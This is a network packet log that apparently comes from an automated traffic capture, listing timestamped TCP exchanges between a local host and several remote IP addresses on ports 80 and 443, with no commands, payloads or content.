                                              Oct 28, 2024 19:04:12.127180099 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.127254009 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.127260923 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.127310991 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.142483950 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.142508030 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.142689943 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.142697096 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.142744064 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.245737076 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.245758057 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.245995998 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.246006966 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.246082067 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.246829987 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.246850967 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.246921062 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.246927977 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.246980906 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.261473894 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.261501074 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.261698961 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.261708021 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.261801004 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.364695072 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.364733934 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.364799023 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.364806890 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.364878893 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.365884066 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.365902901 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.365973949 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.365981102 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.366029978 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.380681992 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.380702972 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.380742073 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.380748987 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.380806923 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.411226988 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.411250114 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.411304951 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:12.411310911 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:12.411359072 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.436652899 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.436669111 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.436721087 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.436738014 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.436753035 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.436779976 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.436800003 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.754746914 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.754761934 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.754806995 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.754853010 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.754863024 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.754913092 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.914150000 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.914181948 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.914258957 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:13.914273977 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:13.914314985 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.075499058 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.075524092 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.075715065 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.075723886 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.075773001 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.392632008 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.392642975 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.392697096 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.392729044 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.392739058 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.392772913 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.392846107 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.553064108 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.553088903 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.553175926 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.553184986 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.553217888 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.553229094 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.553821087 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.553841114 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.553905010 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.553913116 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.553956032 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.714459896 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.714481115 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.714531898 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.714539051 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.714561939 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.714585066 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.714637041 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.714683056 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.714690924 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.714715004 CET44349730188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:14.714757919 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:14.729830980 CET49730443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:15.974745035 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:15.980274916 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:15.980360031 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:15.980616093 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:15.986371994 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:16.857008934 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:16.861835957 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:16.867527008 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:17.124233007 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:17.171948910 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:17.191184044 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.191236973 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:17.191293001 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.197472095 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.197494030 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:17.842879057 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:17.842962980 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.848300934 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.848335028 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:17.848596096 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:17.890702963 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.932676077 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:17.979373932 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:18.089354038 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:18.089415073 CET44349732188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:18.089658022 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:18.093771935 CET49732443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:18.096709967 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:18.102086067 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:18.357861042 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:18.361646891 CET49733443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:18.361696005 CET44349733188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:18.361814976 CET49733443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:18.362143040 CET49733443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:18.362159014 CET44349733188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:18.406338930 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:18.970412016 CET44349733188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:18.972501993 CET49733443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:18.972526073 CET44349733188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:19.122919083 CET44349733188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:19.122982025 CET44349733188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:19.123102903 CET49733443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:19.123475075 CET49733443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:19.126672983 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:19.128005028 CET4973480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:19.133160114 CET8049731132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:19.133239031 CET4973180192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:19.133519888 CET8049734132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:19.133594990 CET4973480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:19.133683920 CET4973480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:19.139308929 CET8049734132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:20.013550997 CET8049734132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:20.015489101 CET49735443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:20.015527964 CET44349735188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:20.015630007 CET49735443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:20.016107082 CET49735443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:20.016123056 CET44349735188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:20.062755108 CET4973480192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:20.655958891 CET44349735188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:20.658458948 CET49735443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:20.658478975 CET44349735188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:20.816893101 CET44349735188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:20.816953897 CET44349735188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:20.817008018 CET49735443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:20.818250895 CET49735443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:20.827660084 CET4973680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:20.833208084 CET8049736132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:20.833302021 CET4973680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:20.833590031 CET4973680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:20.839045048 CET8049736132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:21.702743053 CET8049736132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:21.704941034 CET49737443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:21.704986095 CET44349737188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:21.705056906 CET49737443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:21.705564976 CET49737443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:21.705580950 CET44349737188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:21.750108957 CET4973680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:22.351840973 CET44349737188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:22.368413925 CET49737443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:22.368427038 CET44349737188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:22.531413078 CET44349737188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:22.531467915 CET44349737188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:22.531821966 CET49737443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:22.532365084 CET49737443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:22.539247036 CET4973680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:22.540863037 CET4973880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:22.545053005 CET8049736132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:22.545172930 CET4973680192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:22.546320915 CET8049738132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:22.546412945 CET4973880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:22.546587944 CET4973880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:22.552023888 CET8049738132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:23.419681072 CET8049738132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:23.421042919 CET49740443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:23.421072006 CET44349740188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:23.421200037 CET49740443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:23.421499014 CET49740443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:23.421513081 CET44349740188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:23.468853951 CET4973880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:24.068684101 CET44349740188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:24.083767891 CET49740443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:24.083795071 CET44349740188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:24.234802961 CET44349740188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:24.234879971 CET44349740188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:24.235146999 CET49740443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:24.246125937 CET49740443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:24.263262033 CET4973880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:24.264712095 CET4974280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:24.269244909 CET8049738132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:24.269553900 CET4973880192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:24.270148039 CET8049742132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:24.270227909 CET4974280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:24.273741007 CET4974280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:24.279145002 CET8049742132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:25.148843050 CET8049742132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:25.150949001 CET49745443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:25.151025057 CET44349745188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:25.151102066 CET49745443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:25.151571989 CET49745443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:25.151608944 CET44349745188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:25.203216076 CET4974280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:25.424892902 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:25.424926996 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:25.425144911 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:25.431365013 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:25.431390047 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:25.774045944 CET44349745188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:25.781291962 CET49745443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:25.781354904 CET44349745188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:25.945493937 CET44349745188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:25.945554972 CET44349745188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:25.945765018 CET49745443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:25.946041107 CET49745443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:25.949055910 CET4974280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:25.950088024 CET4974780192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:25.955400944 CET8049742132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:25.955466032 CET4974280192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:25.955498934 CET8049747132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:25.955574036 CET4974780192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:25.955662966 CET4974780192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:25.961106062 CET8049747132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:26.820468903 CET8049747132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:26.825454950 CET49748443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:26.825505972 CET44349748188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:26.825579882 CET49748443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:26.829598904 CET49748443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:26.829641104 CET44349748188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:26.875097036 CET4974780192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:27.238890886 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.238996029 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.240881920 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.240896940 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.241242886 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.281363964 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.339814901 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.387325048 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.474030018 CET44349748188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:27.482763052 CET49748443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:27.482801914 CET44349748188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:27.659691095 CET44349748188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:27.659765959 CET44349748188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:27.659826040 CET49748443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:27.660212994 CET49748443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:27.663748980 CET4974780192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:27.664258957 CET4975080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:27.671339989 CET8049750132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:27.671462059 CET8049747132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:27.671550989 CET4974780192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:27.671659946 CET4975080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:27.671659946 CET4975080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:27.679004908 CET8049750132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:27.780076981 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.828357935 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.828377008 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.875104904 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.934088945 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.934103966 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.934132099 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.934139967 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.934155941 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.934170008 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.934202909 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:27.934215069 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:27.984462023 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.088973045 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.088987112 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.089013100 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.089020967 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.089044094 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.089054108 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.089188099 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.089188099 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.209770918 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.209781885 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.209809065 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.209820032 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.209841013 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.209847927 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.209865093 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.209899902 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.331151962 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.331180096 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.331223965 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.331279039 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.331289053 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.331320047 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.331338882 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.408668995 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.408690929 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.408768892 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.408801079 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.408857107 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.518253088 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.518275976 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.518362045 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.518374920 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.518431902 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.531817913 CET8049750132.226.247.73192.168.2.4
                                              Oct 28, 2024 19:04:28.534214020 CET49752443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:28.534240961 CET44349752188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:28.534317970 CET49752443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:28.534580946 CET49752443192.168.2.4188.114.97.3
                                              Oct 28, 2024 19:04:28.534591913 CET44349752188.114.97.3192.168.2.4
                                              Oct 28, 2024 19:04:28.578227043 CET4975080192.168.2.4132.226.247.73
                                              Oct 28, 2024 19:04:28.606360912 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.606384993 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.606484890 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.606498957 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.606554031 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.726170063 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.726188898 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.726371050 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.726389885 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.726532936 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.813321114 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.813342094 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.813424110 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.813437939 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.813482046 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.933331013 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.933351994 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.933394909 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.933408022 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:28.933444977 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:28.933465004 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.015825033 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.015846968 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.015906096 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.015918970 CET44349746188.132.193.46192.168.2.4
                                              Oct 28, 2024 19:04:29.015965939 CET49746443192.168.2.4188.132.193.46
                                              Oct 28, 2024 19:04:29.015986919 CET49746443192.168.2.4188.132.193.46
